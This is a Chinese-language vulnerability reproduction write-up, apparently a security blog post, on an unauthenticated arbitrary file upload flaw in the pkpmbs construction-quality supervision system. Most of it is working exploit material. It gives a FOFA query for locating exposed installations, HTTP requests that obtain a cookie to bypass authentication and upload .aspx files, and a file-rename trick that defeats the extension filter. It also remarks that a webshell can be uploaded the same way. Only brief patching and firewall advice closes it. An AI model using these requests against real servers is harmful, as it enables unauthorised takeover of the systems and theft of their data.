pkpmbs 建设工程质量监督系统 文件上传漏洞复现

0x01 产品简介

  pkpmbs 建设工程质量监督系统是湖南建研信息技术股份有限公司一个与工程质量检测管理系统相结合的，B/S架构的检测信息监管系统。

0x02 漏洞概述

 pkpmbs 建设工程质量监督系统 FileUpOrDown.aspx、/Platform/System/FileUpload.ashx、接口处存在任意文件上传漏洞，未经身份认证的攻击者可以利用漏洞上传恶意后门文件，从而获取服务器权限。

0x03 影响范围

标准版 <= 2.2023.0328.172228

0x04 复现环境

FOFA：icon_hash="2001627082"

0x05 漏洞复现 

PoC-1

GET /Login.cshtml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

获取有效cookie，绕过权限认证

携带cookie，上传文件 

POST /Applications/Forms/SearchSetting/FileUpOrDown.ashx?operation=Fileupload&extName=.aspx&&searchConfigName=上传的文件名 HTTP/1.1
Host: your-ip
Cookie: your-cookie
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Length: 185

------WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: image/png

test
------WebKitFormBoundarybqACRhAMBHmQQAUP--

回显了上传路径，验证

Getshell

PoC-2 

POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqACRhAMBHmQQAUP
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

------WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/png

test
------WebKitFormBoundarybqACRhAMBHmQQAUP
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------WebKitFormBoundarybqACRhAMBHmQQAUP--

PS：直接是不允许上传aspx文件，需要先上传txt、png等类型文件然后，转换文件格式 

上传png文件

转换文件类型

GET /Applications/SkillDevelopAndEHS/fileMove.cshtml?filePath=上传的文件名&factFilePath=1.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

 根据上面回显的路径验证

上传马子也是同样的姿势

0x06 修复建议

官方已修复该漏洞，请用户联系厂商升级至安全版本：http://www.hunanjianyan.com/

通过防火墙等安全设备设置访问策略，设置白名单访问。

如非必要，禁止公网访问该系统。